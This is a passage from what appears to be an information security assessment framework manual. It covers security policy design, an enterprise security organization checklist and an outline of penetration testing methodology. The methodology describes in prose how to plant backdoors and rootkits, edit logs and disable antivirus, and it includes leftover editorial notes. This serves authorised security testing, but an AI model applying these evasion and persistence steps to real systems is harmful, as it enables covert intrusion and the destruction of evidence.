acronyms and jargons of IT while IT finds it difficult to understand the strategic business
language. One quip often heard is that businesses are not in existence to buy more
firewalls and spend on upgrading the IDS systems. Managers want a ‘business case’
established and IT finds it hard to fit into this approach not because they don’t
understand it fully but because IT still does not neatly fit into known financial approaches
to deciding on ‘business cases.’ Having said that, it must also be said in fairness to IT
that managements also need to understand that their strategic competitive advantage
depends significantly on the information technology and processing infrastructure they
have deployed.
Guidelines for valuation of assets (used in a variety of ways – for assessing insurance
premium, calculating the RTO while performing BIA, implementing access control
models…) are best placed in the security policy since it is endorsed at the highest level
in the organization. Another important role played by Security Policy is in the process of
creating Business Continuity Planning (BCP) and Disaster Recovery Planning (DRP),
which requires building on the layered defenses that the security architecture would
have created.
Fine tuning recovery strategy requires the definition of security
parameters especially when the recovery is physically carried out at a location outside
the premises of the enterprise. Security Policy has a significant contribution to make in
this case.
Policies, apart from demonstrating executive managements’ commitment to securing
information assets, is also used as a vehicle to periodically reinforce security related
messages, continuously raise security awareness and push for goal congruence
between corporate goals and security goals. It is arguable as to who has to work for the
goal congruence; is it to be done by the IT managers responsible for security to align it
with corporate goals and objectives or should it be done by top management? The
Page 98 of 1123
policy is also to be used for defining the various human interfaces of security. Primarily,
the policy sets the framework for security organization structure, description of job
responsibilities, constituting security teams (like security implementing team, security
assessment team, A&P team, forensics team, assurance team, etc.) Organizations do
not have all these teams functioning on a permanent basis but are quickly assembled
whenever a security incident occurs or is suspected. Even the definition of what is
security incident need clarity to move carefully between the extremities of complacence
and over-reaction. All these are addressed in the security policy.
A further function of security policy is to provide clear guideline on how to handle a
conflict that might arise when implementing a security mechanism. The conflict could be
due to multiple locations in the same organization interpreting their security needs
differently or due to different professionals interpreting a security situation differently or
even a basic question like ‘Is this a security breach?’ The policy assists managers to
take a consistent, fair and appropriate stand in the face of these conflicts.
6.5.2 Policy and Trust
Information Security policies, like every other enterprise policy, involves people. Policies
are designed and implemented so that the actions and interactions of people among
themselves and with the constituents of Information Processing Facilities, Trusted
Computing Base, etc. are consistent with the enterprise security stance. The moment we
talk of interaction amongst humans, it involves trust related issues. Policy writers take
two extreme stand points though most of the policy designers tend to tread the middle
path. One extreme is to state that policies are written only because we always think
people will not do the right things.
Other extreme is to design polices on the
presumption that people would do only the right things! As can be readily seen, neither
of these extremes are always true. Even if we desire to trust all systems and people,
what is witnessed over the past force us to move away and start distrusting people and
processes.
Software from reliable sources suddenly throws up a bug or someone
discovers a Trojan in it or a backdoor carefully concealed! A trusted person gets into a
problem when on vacation and the stand-by colleague discovers something odd –
leading to a trail of frauds! When a security policy is written, conservatively it may be
prudent not to totally trust any person or process to function correctly always and under
all conditions. Trust takes time to build. Careful monitoring over long periods can build
Page 99 of 1123
sufficient trust to break parts of control if such control dilution can add to other
advantages - most importantly effectiveness in operations or a general feeling of
goodness, which could lead to greater efficiencies in operations. There are no hard and
fast rules on trust; it depends on a variety of variables including organizational culture
and the sensitivity of information asset being handled. Determining the right level of trust
is a delicate and very difficult task; too little of it may lead to high attrition rates or low
morale and too much might eventually result in security infractions. Maintaining the right
level of trust is a good acid-test for successful mangers.
6.5.3 Some issues of design
Policies affect the way people work.
It is therefore a good practice to work on a
consensus-based policy development and implementation wherever possible. While it is
not always possible to get a consensus on all policy issues due to a number of factors, it
would be worthwhile to get all those who would be affected by the implementation of the
policy to review the policy and share their views as to how the proposed policy could
impact their work – in terms of productivity, personal efficiencies, adherence to best
practices, impact of changes from what is currently happening, etc. At the stage of
eliciting this consensus, if it is demonstrated that the implementation of a policy would
result in an unfavorable situation, it may be worthwhile re-visiting the policy.
It is important to review the policy with the IT support staff just as being done with users
since IT support staff would be involved heavily in the implementation of the policy.
Since implementation of a policy is as important as designing it and monitoring it, the IT
support function that would be involved in implementation should be fully involved in this
process. Often the views of the IT support staff results in significant enhancement to the
degree of controls and the manner of implementing controls.
Security Policies, like all other corporate polices and plans tend to get out-dated and
obsolete. A clear process of change management needs to be put in place to ensure
that any policy changes take place along side any changes in any of the attributes that
has an impact on the policy. A clear process of putting in place a version control is also
to be built and implemented so that different parts of the organization do not conform to
different versions of the policy!
Page 100 of 1123
Policies that are not appropriately disseminated are no policies at all. All users and
anyone who is in any way connected with a policy implementation should have a copy of
the policy and the policy dissemination process should include a way of getting the users
and others to acknowledge, in unambiguous terms, that they have received a copy of the
policy, studied and understood it and agree to abide by it. This document is a must for
the organization to enforce the policy and also ensure that where the policy is violated,
no defense is taken in a court of law by the person who violated the policy that he / she
did not know of the existence of such a policy. Continuous awareness must be created
through a variety of ways including security awareness programs, policy awareness
workshops and regular stress in corporate internal communications that adherence to
policies will result in better security.
While this chapter’s objectives are to help a user assess an existing security policy, it
also attempts to give a user enough knowledge to key factors to consider in formulating
a security policy & the critical components that should be included in the security policy.
6.5.4 Security Policy Development Model for Security Policies
6.5.4.1 ESTABLISHING A POLICY TEMPLATE
The Risk Assessment Methodology, the classification levels & the security services
needed for securing the information systems are good guiding principles to establish a
security policy for the entire organization. The Legal department should also ascertain
that the statements within the policy are in compliance with the Local Regulations &
other privacy laws. The policy should have disciplinary statements that mention the
punishment meted out in case there is non-compliance to the policies. The policies could
be high-level statements that could talk about the management’s intention to treat
information security within the firm on priority and it may also be detailed in terms of
outlining various controls & strategies the firm may use to secure the information.
Page 101 of 1123
6.5.5 The Policy must address:
6.5.5.1 MANAGEMENT STATEMENT ON INFORMATION SECURITY
This statement shall include the management’s commitment & support to information
security within the organization. This will also encourage other business units to
participate in the information security program for the firm.
6.5.5.2 DISCIPLINARY STATEMENT
The policy must include a statement, which should talk about the disciplinary process
which shall be taken in case there is a non-compliance with the policies mentioned
below. Disciplinary measures can be up to termination of employment.
6.5.5.3 THE SECURITY ORGANIZATION & THE ROLES AND RESPONSIBILITIES
This section should include the various roles in the information security program. This
should include at minimum the role of the Information Security Officer, the information
owners, the end users, the systems administrator & the end users.
6.5.6 For the End-Users
6.5.6.1 ACCEPTABLE USE OF COMPUTER SYSTEMS & RESOURCES
This policy talks about how information systems are important to the organization and it
also talks about prudent usage of computer systems by the employees. Most
organizations have a policy mentioning that all data stored on the organizations
computer systems belongs to the organization & that the employee activity may be
monitored.
6.5.6.2 E-MAIL USAGE POLICY
This policy talks about prudent usage of e-mail resources. This means that the
employees can use the e-mail system for personal purposes as long as there isn’t
significant usage of the organization bandwidth.
Page 102 of 1123
6.5.6.3 INTERNET USAGE
Internet usage is mostly granted to employees requiring access for business purposes.
Employees are also advised against posting any comments on websites with the
company e-mail id unless authorized to do so.
6.5.6.4 ENCRYPTION OF SENSITIVE DATA
Employees should be advised to encrypt sensitive information before sending it on the
Internet using the firms approved products. They should also confirm the identity of
senders and ensure that it is from an authentic source before using information sent to
the users.
6.5.6.5 ANTI-VIRUS POLICY
The anti-virus policy should advise users about scanning attachments before getting
them from external sources. They should also report virus incidents to the concerned
people that could help in containing the viruses/worms before they start spreading to
other systems.
6.5.6.6 PASSWORD PROTECTION POLICY
Password protection policy talks about the selection of passwords & password
complexity and other parameters like password change frequency; history
6.5.6.7 REMOTE ACCESS POLICY
The remote access policy asks users to ensure that all controls like personal firewalls etc
are running well before they connect to the firms systems. This should also create
awareness among users about the possible installation of key loggers and other Trojans
while connecting to the firms systems from the internet or other untrusted networks.
6.5.6.8 INCIDENT REPORTING POLICY
This policy should educate the users on possible security breaches and the way these
incidents to be reported to the concerned authorities.
Page 103 of 1123
Some Companies ask the employees to sign the Intellectual Property Rights agreement
so that the Company’s IPR is safeguarded. The IPR Agreement needs to be prepared
according to the company’s business needs and in consultation with legal Department.
6.5.7 For the Information Owners
6.5.7.1 RISK ASSESSMENT & ASSET CLASSIFICATION
The information owners should be entrusted with the Risk assessment & classification of
the information systems in their purview. They along with the representatives form the
information security department must classify & label the data by analyzing the threats.
In case of shared systems across multiple business units the business managers must
co-own the data & all of them must be involved in the risk assessment exercise.
Information owners must be entrusted with the responsibility of completing the Risk
assessment exercise and the information security representatives must act as
consultants in facilitating this process.
6.5.7.2 OUTSOURCED SERVICE PROVIDERS ENGAGEMENT POLICY
The information owners must notify the information security department about possible
engagements with outsourced service providers before establishing a relationship. The
information security department should analyze if the service providers meet the
minimum criteria required so that the organizations data can be entrusted to the service
provider’s Service Level Agreements (SLA) Needs to be defined for the Outsourced
agency.
6.5.7.3 BUSINESS CONTINUITY & DISASTER RECOVERY POLICY
The information owners must be advised to make continuity plans in case of exigencies.
The BCP team or the Information Security team would facilitate this process. This also
requires the information owners to maintain the required call trees and establish DR
processes for the businesses information systems.
Page 104 of 1123
6.5.8 For the IT Department
6.5.8.1 PHYSICAL SECURITY OF INFORMATION SYSTEMS
This policy must advise the IT Department or other departments (Administration) to
deploy all possible security controls to protect the information systems from damage,
loss & theft. This may require deploying & operating some controls like a PACS
(Personal Access Control System). This should also talk about equipment sitting &
procedures to be followed when physical access is required (like maintaining a log of all
access to the server systems). This should also address procedure for operating
environmental controls
6.5.8.2 NETWORK & SYSTEMS SECURITY POLICY
This should discuss the security mechanisms to be implemented on Network & Server
systems. The main criteria for configuration of systems should be that access should be
granted to resources as required.
6.5.8.3 WIRELESS SECURITY
This is an area which is a matter of grave concern. The wireless systems should be
properly configured with adequate authorization & authentication methods.
6.5.8.4 APPLICATION DEVELOPMENT & DEPLOYMENT
The application development & deployment policy should talk about how security should
be a consideration at the time of application development itself. The policy should also
discuss means in which the application must first be unit tested , then tested on an
integration environment and only after it passes the security tests should it be deployed
on the production systems.
6.5.8.5 INTERNET & THIRD PARTY CONNECTIVITY
This policy should talk about secure connectivity to the internet & third parties. The
organizations acceptable method for external connectivity & the authorization process for
the same should be discussed. Some organizations conduct a penetration test on the
third party networks before allowing connectivity into their systems.
Page 105 of 1123
6.5.8.6 VENDOR ENGAGEMENT POLICY
The vendor engagement policy would discuss what minimum security criteria a vendor
must adhere to before the organization can establish a relationship. E.g includes a
vendor should have a proper background check of all its employees before the vendor
representatives work with the organization.
6.5.8.7 BACKUP & SYSTEMS AVAILABILITY POLICY
This policy entrusts the proper functioning of the network infrastructure & backup of
information systems to the IT Department.
6.5.9 For the Information Security
6.5.9.1 MONITORING & REVIEW OF SYSTEM SECURITY EVENTS
The information security team should be advised to check the security events on a
regular basis and report breaches or incidents serious in nature to the management. The
information security team should regularly monitor for any non-compliance to the security
policy as well & work with the business units to have those rectified
6.5.9.2 SYSTEMS VULNERABILITY ASSESSMENT & PENETRATION TESTING
The information security department is often entrusted with the responsibility of
conducting vulnerability assessment & penetration tests. This policy talks about how
these must be carried out with proper authorization.
6.5.9.2.1 THIRD PARTY (VENDOR & OUTSOURCED SERVICE PROVIDERS) ENGAGEMENT
REVIEW
The information security team may be required to go onsite & conduct reviews of the
Services providers & vendors to ensure that they comply to the minimum security criteria
as required by the organizations. This policy details the information security roles in the
process.
6.5.9.2.2 INCIDENT RESPONSE
Page 106 of 1123
The incident response policy details the method of investigating any reported security
breaches. How & when law enforcement agencies must be contacted & who should be
responsible for communicating with the media should be covered.
6.5.9.2.3 BUSINESS CONTINUITY PLANNING
The information security department should also be facilitating the BCP for various
business units & should review test results & appraise the management about the same.
6.5.9.2.4 SECURITY AWARENESS & TRAINING
This is an often-overlooked subject; the information security department must be
responsible for training all users in the organizations. They must also design &
constantly update their security awareness programs.
Page 107 of 1123
7 ENTERPRISE SECURITY ORGANIZATION &
MANAGEMENT
7.1 INTRODUCTION
7.2 PRE-REQUISITE
Document containing organizational structure of entire organization, IT department,
enterprise security organization, internal audit. Document containing formally approved
roles and responsibilities, job description for enterprise security functions, any third party
assessment/review etc...
7.3 OBJECTIVE
To evaluate management support to the security functions, identify segregation of
duties, third party security and to address outsourcing security concerns.
7.4 ASSESSMENT QUESTIONNAIRE
This section contains a set of suggested evaluation check list that are expected to
broadly fit the ISSAF based assessment process. Recognizing that each organization
has its own unique processes, technologies and information processing architecture, it is
possible that the ISSAF evaluation may need further steps to be performed. It is also
possible that some of the suggested checks may need amplification. The assessor who
is carrying out the ISSAF based evaluation should therefore use these check lists as
guides and evolve a process that best fits the organization being reviewed.
Evaluation Check
1
Management Support
1.1
Does the organization having formally
approved enterprise security organization?
1.2
Is there adequate management support
for the information security within the firm?
Yes
No
N/A
Evaluation Performed and
Results
Page 108 of 1123
1.3
Has the Chief Security Officer/Chief
Information Security Officer (CSO/CISO)
been formally authorized to ensure that
other departments implement
recommendations made with respect to
security?
1.4
Are the responsibilities for each of the
roles in the information security department
clearly defined?
1.5
Does the enterprise security organization
have an appropriate relationship with
2
3
The HR department
The IT department
The various business departments
Legal Department
The employees of the company
Administration Department (This
generally takes care of the In-house
activities and facility management in some
companies)
Segregation of duties
Is there any conflicting or overlap of the
roles that can potentially cause the security
to collapse? E.g. Enterprise security
personnel reporting to IT department.
Are there proper segregations of duties
within the information security department?
Is there any overlap of responsibilities
due to this segregation of duties?
Are two-person control exercised within
the company?
Are mandatory vacations implemented for
enterprise security personnel?
Are peer review performed on enterprise
security if applicable?
Third party security concerns
Is there any formally approved policy
regarding third party access to enterprise
information systems (Physical and Logical)?
Is there any compliance review performed
to ensure third party access to enterprise
information systems based on approved
policies?
4
Are there formally signed off documentation
for approvals and reviews on third party
access?
Outsourcing
Is there any legally defined contract
between both parties for outsourced
security services / solutions?
Page 109 of 1123
Has this contract been reviewed by the
legal department for any legal and
regulatory compliance?
Does the contract contain Non disclosure
clause relating to enterprise information
assets?
Is there any clause specifying damages to
be paid in the event of non compliance?
Has enterprise performed a security
evaluation of outsourcer's information
systems used in delivering the services? If
not has there been a third party review of
outsourcer's information systems in
delivering the services.
Is there any process to evaluate the
services provided against the service level
agreements?
Is there any process to terminate the
contract?
Page 110 of 1123
7.5 ASSESSMENT QUESTIONNAIRE - NARRATIVE
The following narrative supports the understanding of the contents and logic that is
embedded in the assessment questionnaire. While the questionnaire is structured on
the basis of possible process flow that may be found in many enterprises, the narrative is
presented to aid an understanding of the concepts covered in this domain.
7.5.1 Introduction
The security organization plays a vital role in the effective implementation of policies & in
maintaining the overall security posture of a company. Most companies generally
consider information security as information technology security. The scope of
information security is much more broader than just IT security since information in an
organizational context extends beyond data processing and computers and therefore
involves a lot of interaction with other business departments. For such reasons, some
argue that it is best to have the Information security aligned to the Operations
Department.
Organizational status and independence of the information security
function has a significant impact on the effectiveness and efficiency of the security
function. Traditional organization theory has it that the higher the head of a function
reports to, the greater is the independence of that function.
While this has been
challenged in a few studies, we can safely recommend that for optimal levels of
organizational independence, the head of Information Security Organization should
report to the head of the organization. Everything else is a compromise. There are a few
who argue that information security being too technical a matter, the head of security
operations should ideally report to the CIO. That approach merits little attention since
the CIO is responsible for the efficient and effective use of the information assets for
furthering business objectives and the function of protecting information assets is too
specialized to be bracketed with operational responsibilities. It also matter as to how
information is viewed in the organizational context – is it seen as a support function, or
as an enabling function or as a driver or as a function that directly contributes to creating
and sustaining strategic competitive advantage.
This perception best drives the
organization structure of the security organization and its responsibility – authority
paradigm.
There are a number of organization driven controls (also referred to as Administrative
Controls) that add to the overall security of the organization’s information assets without
necessarily resorting to technology for conceptualization or implementation.
Page 111 of 1123
7.5.2 Segregation of Duties
Segregation of duties is a very important administrative control in information security.
This is achieved by ensuring that no complete operation cycles are completed by a
single individual or no operation cycles that have significant security content is
completed by a single individual. The various duties constituting a transaction cycle is
segregated and given for completion by two or more people who are normally peers. If
the duties are segregated the chances that certain privileges may be misused are
reduced greatly. If the system administrators’ role is to create user accounts and give
access to system users & also ensure optimal performance of the systems. All this
activity can be logged and monitored by staff dedicated to doing system monitoring. Only
collusion by individuals from the two roles can bypass the security provided by this
approach.
Structure based Controls
Similarly it might make sense to split up the duties in the information security
organization as well. E.g. having a separate Information Risk Management team &
information security team might help in segregation of duties. The information risk
management team can conduct risk assessments and advise the various business
groups on the steps needed to be in compliance with the company’s
Information
security policies. The information security staff should be made responsible to see to it
that required controls have been implemented & have the information risk management
team report on their effectiveness. This avoids any complacency in the information
security team & an authentic report is created because this is done by the IRM whose
goals are to find & report on the security flaws within the information systems deployed.
Another important part, which determines the company’s security is the Internal Audit
Department. This department should never be aligned to the information security and
should ideally report to the CEO of the company. The internal audits responsibilities are
to check compliance with the organizations security policies & report any anomalies
found to the concerned authority. The audit is generally a half yearly or yearly exercise &
can be considered as very rigorous checks of the controls deployed within the company.
Page 112 of 1123
7.5.3 Two-person Controls
Another form of administrative control that harnesses the organization structure is twoperson controls.
In this situation, the rationale is similar to that which justifies
segregation of duties. However, unlike segregation of duties that require two persons to
do different but sequenced operations to complete a process cycle, in the case of two
person controls, two persons simultaneously perform certain operations so that in the
absence of one, the other cannot complete the process or operation.
7.5.4 Peer Review
Unlike a supervisory review which comes with its share of psychological and behavioral
issues, the concept of peer review of security operations have come to be accepted
amongst security professionals as a good organizational control mechanism. In this
process, the work of one person is reviewed by his/her peer. The peer is often as
knowledgeable as the person who performed the operation.
A healthy competition
exists which assists the organization to have a higher degree of expertise brought into
play. Of course, it also grants the organization the additional layer of security since the
peers, being professionals, would bring to light any attempted actions by any person that
would result in a security infraction; whether such action is with malicious intent or due to
ignorance or negligence.
7.5.5 Mandatory Vacations
This form of administrative control has been recommended for quite some time now has
yielded good results in organizations that had implemented it. This control stems from
the belief that anyone involved in a security infraction would be able to hide it
successfully so long as he/she is able to be present at the place of security violation and
can continue to cover up the violation. It is therefore recommended that every person
involved in any operation that has a security element in it should be asked to go on
regular vacation. The obvious reason being that while the person is on vacation, his/her
successor who handles the operations would find any security infraction that had been
carefully concealed by the earlier person.
Page 113 of 1123
8 ASSESS ENTERPRISE SECURITY & CONTROLS
[This page is intentionally left blank.]
Page 114 of 1123
A PENETRATION TESTING - METHODOLOGY
A technical security audit of an organization’s information technology infrastructure
helps management in taking decisions on appropriate security investments and course
of action to correct or improve security. One of the main parts of such a security audit is
penetration testing. This chapter describes the process of performing a penetration test,
covering the following steps:
1. Information Gathering
2. Network Mapping
3. Vulnerability Identification
4. Penetration
5. Gaining Access & Privilege Escalation
6. Enumerate Further
7. Compromise Remote Users/Sites
8. Maintaining Access
9. Covering The Tracks
10. Audit
11. Reporting
12. Clean up and Destroy Artifacts
Page 115 of 1123
Information
Gathering
1
Clean Up and
Destroy
Artifacts
Network
Mapping
12
2
3
Vulnerability
Identification
Reporting
11
Technical
Control
Assessment
Auditing
10
4
Penetration
5
Covering
Tracks
Gaining Access
& Privilege
Escalation
9
Maintaining
Access
6
Enumerate
Further
8
7
Compromise
Remote
Users/Sites
Page 116 of 1123
A.1 INFORMATION GATHERING
Information gathering is essentially using the Internet to find all the information you can
about the target (company and/or person) using both technical (DNS/WHOIS) and nontechnical (search engines, news groups, mailing lists etc…) methods. This is the initial
stage of any information security audit, which many people tend to overlook. When
performing any kind of test on an information system, information gathering and data
mining is essential and provides you with all possible information to continue with the
test. Whilst conducting information gathering, it is important to be as imaginative as
possible. Attempt to explore every possible avenue to gain more understanding of your
target and its resources. Anything you can get a hold of during this stage of testing is
useful: company brochures, business cards, leaflets, newspaper adverts, internal
paperwork, and so on.
Information gathering does not require that the assessor establishes contact with the
target system. Information is collected from public sources on the Internet (mainly) and
organizations that hold public information (e.g. tax agencies, libraries, etc.)
This section of the assessment is extremely important for the assessor. Assessments
are generally limited in time and resources. Therefore, it is critical to identify points that
will be most likely vulnerable, and to focus on them. Even the best tools are useless if
not used appropriately and in the right place and time. That’s why experienced
assessors invest an important amount of time in information gathering.
A.2 NETWORK MAPPING
Following the first section, when all possible information about the target has been
acquired, a more technical approach is taken to ‘footprint’ the network and resources in
question. Network specific information from the previous section is taken and expanded
upon to produce a probable network topology for the target. Many tools and applications
can be used in this stage to aid the discovery of technical information about the hosts
and networks involved in the test.
•
Find live hosts
•
Port and service scanning
•
Perimeter network mapping (router, firewalls)
Page 117 of 1123
•
Identifying critical services
•
Operating system fingerprinting
•
Identifying routes using Management Information Base (MIB)
•
Service fingerprinting
To be effective, network mapping should be perform according to a plan. This plan will
include probable weak points and/or points that are most important to the assessed
organization, and will take into consideration all information obtained on the previous
section.
Network mapping will help the assessor to fine tune the information previously acquired
and to confirm or dismiss some hypotheses regarding target systems (e.g. purpose,
software/hardware brands, configuration, architecture, relationship with other resources
and relationship with business process).
A.3 VULNERABILITY IDENTIFICATION
Before starting this section, the assessor will have selected specific points to test and
how to test them. During vulnerability identification, the assessor will perform several
activities to detect exploitable weak points. These activities include:
•
Identify vulnerable services using service banners
•
Perform vulnerability scan to search for known vulnerabilities. Information regarding
known vulnerabilities can be obtained from the vendors’ security announcements, or
from public databases such as CVE or CERT advisories.
•
Perform false positive and false negative verification (e.g. by correlating
vulnerabilities with each other and with previously acquired information)
•
Enumerate discovered vulnerabilities
•
Estimate probable impact (classify vulnerabilities found)
•
Identify attack paths and scenarios for exploitation
A.4 PENETRATION
Page 118 of 1123
The assessor tries to gain unauthorized access by circumventing the security measures
in place and tries to reach as wide a level of access as possible. This process can be
divided in the following steps:
•
Find proof of concept code/tool
Find proof of concept code available in your own repository or from publicly available
sources to test for vulnerabilities. If the code is from your own trusted repository and
thoroughly tested, you can use it, otherwise test it in an isolated environment.
•
Develop tools/scripts
Under some circumstances it will be necessary (and cost effective) for the assessors to
create their own tools and scripts.
•
•
Test proof of concept code/tool
o
Customize proof of concept code/tool
o
Test proof of concept code/tool in an isolated environment
Use proof of concept code against target
The proof of concept code/tool is used against the target to gain as many points of
unauthorized access as possible.
•
Verify or disprove the existence of vulnerabilities
Only by testing vulnerabilities will the assessors be able to confirm or disprove
vulnerabilities definitively.
•
Document findings
This documentation will contain detail explanations of exploitation paths, assessed
impact and proof of the existence of vulnerability.
A.5 GAINING ACCESS AND PRIVILEGE ESCALATION
In any given situation a system can be enumerated further. Activities in this section will
allow the assessors to confirm and document probable intrusion and/or automated
attacks propagation. This allows for a better impact assessment for the target
organization as a whole.
A.5.1 Gaining Access
A.5.1.1 GAIN LEAST PRIVILEGE
Page 119 of 1123
Gaining least privilege access is possible by obtaining access to unpriviledged accounts
through several means, including:
•
Discovery of username/password combinations (e.g. dictionary attacks, brute force
attacks)
•
Discovery of blank password or default passwords in system accounts
•
Exploit vendor default settings (such as network configuration parameters,
passwords and others)
•
Discovery of public services that allow for certain operations within the system (e.g.
writing/creating/reading files)
A.5.1.2 GAIN INTERMEDIATE PRIVILEGE
(*** NOTE: BALWANT:
I would leave a single section on “Gain privilege”, instead of
having a “gain least…” and a “gain intermediate….” sections.
A.5.1.3 COMPROMISE
Reaching the target of the assessment (be it a specific system or a network) may require
that intermediate systems be compromised as well, in order to bypass their security
measures that may be potentially protecting access to the assessor’s final target. These
possible intermediate hops can be routers, firewalls, domain member servers,
or
workstations, to name a few.
A.5.1.4 FINAL COMPROMISE ON TARGET
This step is the final compromise. The final target has been breached and is under
complete control of the assessor.
A.5.2 Privilege Escalation
If access is gained, follow steps 1 to 6 again.
A.6 ENUMERATE FURTHER
•
Perform Password attacks to find more additional accounts (by using sniffing or
password cracking)
Page 120 of 1123
•
Sniff traffic and analyze it
•
Gather cookies and use them to exploit sessions and for password attacks
•
E-mail address gathering
•
Identifying routes and networks
•
Mapping internal networks
•
Perform steps 1 to 6 again with this system as starting point
A.7 COMPROMISE REMOTE USERS/SITES
A single hole is sufficient to expose entire network, regardless of how secure the
perimeter network may be. Any system is as strong (in this case, as secure) as the
weakest of its parts.
Communications between remote users/sites and enterprise networks may be provided
with authentication and confidentiality, by using technologies such as VPN, to ensure
that the data in transit over the network cannot be faked nor eavesdropped However,
this does not guarantee that the communication endpoints haven’t been compromised.
Assessor should try to compromise remote users, telecommuter and/or remote sites of
an enterprise. It will give privileged access to internal network.
If you are successful to gain access into remote sites, follow step 1.1 to 1.7, else move
to next step.
A.8 MAINTAINING ACCESS
A.8.1 Covert Channels
Covert channels can also be used to hide your presence on systems or on the network.
Covert channels can be either protocol-tunnels (like icmp-tunnel, http-tunnel etc…) of
can (ab)use VPN tunnels. Perform following steps to use covert channels:
•
•
•
•
Identify Covert Channel Which Can Be Used
Select the Best Available Tool for the Covert Channel
Methodology - Setup the Covert Channel in the Target Network
Test the Covertness of Channel Using Common Detection Technique
Page 121 of 1123
A.8.2 Backdoors
Backdoors are meant to be able to always get back to a certain system, even if the
account you used to hack the system is no longer available (has been terminated, for
example). Backdoors can be created in several ways. Either by using root-kits (see
further), by opening a listening port on the target system, by letting the target system
connect to your server, by setting up a listener for a certain packet sequence which in
turn will open up a port…
A.8.3 Root-kits
Root-kits will allow you to have even more power than the system administrator does of
a system. You will be able to control the remote system completely.
A.9 COVER THE TRACKS
A.9.1 Hide Files
Hiding files is important for the security assessor/auditor to hide activities which he has
done so far while and after compromising the system and to maintain back channel[s].
This is also important to hide his tools so that these shouldn’t be uploaded each time to
the target server.
A.9.2 Clear Logs
The importance of this stage is easily understood but usually understated. After an
attacker has successfully compromised a system, he will like to keep it without alerting
the administrator, for obvious reasons. The longer the attacker stays on a compromised
system, the better the chances that he will be able to achieve his goals further in the
network.
During the process of compromising the system, some suspicious and/or erroneous
activities are logged. A skilled attacker knows that logs need to be doctored. He modifies
them to cover his tracks and delude his presence.
Note: This is only effective if no remote Syslog servers are in use. If these are, these
remote Syslog servers will have to get hacked & cleared as well…
Methodology
Page 122 of 1123
•
Check History
•
Edit Log files
A.9.3 Defeat integrity checking
[Text]
A.9.4 Defeat Anti-virus
Nowadays, on most workstations and servers, Anti-Virus software is protecting the
system against well known malicious software (like exploits, viri, worms…) The
importance of this step in penetration testing is to be able to disable or defeating AV
software so that the assessor is able to come back later (just testing the possibility).
In most centrally managed AV solutions, the AV software is restarted after a certain
amount of time when it is stopped by an assessor. This “grace period” allows the
assessor to perform several tasks so that the AV software will be disabled for longer
periods of time.
Possible things that assessors can do (most of these require Administrator level access):
•
creating a batch file so that the AV services are stopped every 30 sec
•
Disabling the AV services
•
Blocking the central management port
A.9.5 Implement Root-kits
Root-kits, like POC exploits, should be customized to be able to completely cover us. In
most of cases if there is an AV patrolling, root-kits (usually on win32) would be detected
before installation. So, tampering the root-kits is required in most of the situations. It’s
also important to notice that some root-kits wouldn’t work on different system setups. For
example your root-kit may work on win2k-SP3 but it can’t cover anything on SP4.
A.10 AUDIT
Sometimes, system audits can even tell more about potential security vulnerabilities than
a single penetration test. Therefore, system audits should be performed after completing
a penetration test. The system audits should check for running services, open ports,
Page 123 of 1123
established connections, file system permissions, logging and/or remote logging,
auditing as per the detailed check list of particular system.
A.11 REPORTING
The reporting should follow a well documented structure. Things that should be definitely
in the report are the following parts:
•
management summary
•
Scope of the project (and Out of Scope parts)
•
Tools that have been used (including exploits)
•
Dates & times of the actual tests on the systems
•
Every single output of tests performed (excluding vulnerability scan reports which
can be included as attachments)
•
A list of all identified vulnerabilities with included recommendations on how to
“cure” the vulnerabilities found.
•
A list of Action points (what recommendation to perform first, what is the
recommendation curing?)
For more detail refer to the vulnerabilities section
A.12 CLEAN UP AND DESTROY ARTIFACTS
Al information that is created and/or stored on the tested systems should be removed
from these systems. If this is for some reason not possible from remote distance, all
these files (with their location) should be mentioned in the technical report so that the
client technical staff will be able to remove these after the report has been received.
Page 124 of 1123
B PENETRATION TESTING METHODOLOGY:
DESCRIPTIVE – (CONTINUE….)
B.1 INFORMATION GATHERING
Description
Information gathering consists of collecting all possible information about the target of
the security assessment to help the assessor to perform a thorough security evaluation.
In most cases the main source (and possibly the only one) of information is the Internet.
The Internet can provide information about the target (company and/or person) using
several methods, both technical (e.g. DNS/WHOIS) and non-technical (search engines,
news groups, mailing lists, etc…).
This is the initial stage of any information security audit, which is often overlooked. When
performing any kind of test on an information system, information gathering and data
mining is essential and provides you with all possible information to continue with the
test. Whilst conducting information gathering, it is important to be as imaginative as
possible. Attempt to explore every possible avenue to gain more understanding of your
target and its resources. Anything you can get a hold of during this stage of testing is
useful: company brochures, business cards, leaflets, newspaper adverts, internal
paperwork, and so on.
Goal
The aim of information gathering is exploring every possible avenue of attack; it gives a
complete overview of the target and their practices, enabling you to test every vector
relating to their information security. From gathering information using the techniques
and resources outlined in this document you can learn many things about a target’s
information systems (e.g. what phone system they use, what OS’s they have on-site,
how many employees they have, financial data, security history, and so on).
This step enables you to be as thorough as possible during all other stages of the
methodology. Gathering information enables you to test every entry vector and allows
you to map out a virtual topology of a person and/or their company, assets, and
associated.
Page 125 of 1123
Expected Results
After following the mentioned steps, a pen-assessor may be able to gain insight into the
target network:
•
Employees (name and number of employees, role, positions and contact details,)
•
Technology partners (technologies used, locations, computing platforms)
•
Business partners (involvement, location, their trust relationship, and so on)
•
Business/financial history, investments, and investor details
•
Web presence (name and number of domains, where they are hosted, etc.)
•
Physical locations (offices, data centers, partners, warehouses)
•
Network topology and -architecture
•
Technologies being implemented on the network
•
E-mails, phone numbers, or any other personal information
•
Company location, product names, and names of senior managers in the
company
•
IP block owned
•
Administration and maintenance contact for target domain and IP block
Pre-requisite
An Internet connection and a good imagination, logins to any associated business
portals would also be useful but these may be gathered in later stages.
History
This section has the longest history as data gathering has been used in many areas long
before the advent of computers. For example Sun Tzu said:
“With advance information, costly mistakes can be avoided, destruction averted,
and the way to lasting victory made clear.”
And
“Investigate and plan before moving to the open battlefield, thus minimizing harm
to self and the opponent”
Page 126 of 1123
The idea of information gathering runs throughout The Art of War and it emphasizes how
important gaining knowledge about any adversary is. This is also the case during a
security test/audit as in a way; it is a simulated cyber war, which in many ways can
benefit from the wisdom of Sun Tzu.
The gathering of data allows a security assessor to be cautious, to move through target
networks and data systems silently, and to assess the strengths and the weaknesses of
the information systems involved.
Of course, there are many other areas that have used information gathering such as
corporate and political espionage, wartime reconnaissance, and similar situations.
Information Gathering can be divided into two parts. 1. Passive information gathering
and 2. Active information gathering
Page 127 of 1123
PASSIVE INFORMATION GATHERING
As per dictionary passive means “accepting or allowing what happens or what others do,
without active response or resistance”
In the context of this framework “Passive Information Gathering” means that target is not
probed at all.
Methodology
Locate the target Web presence
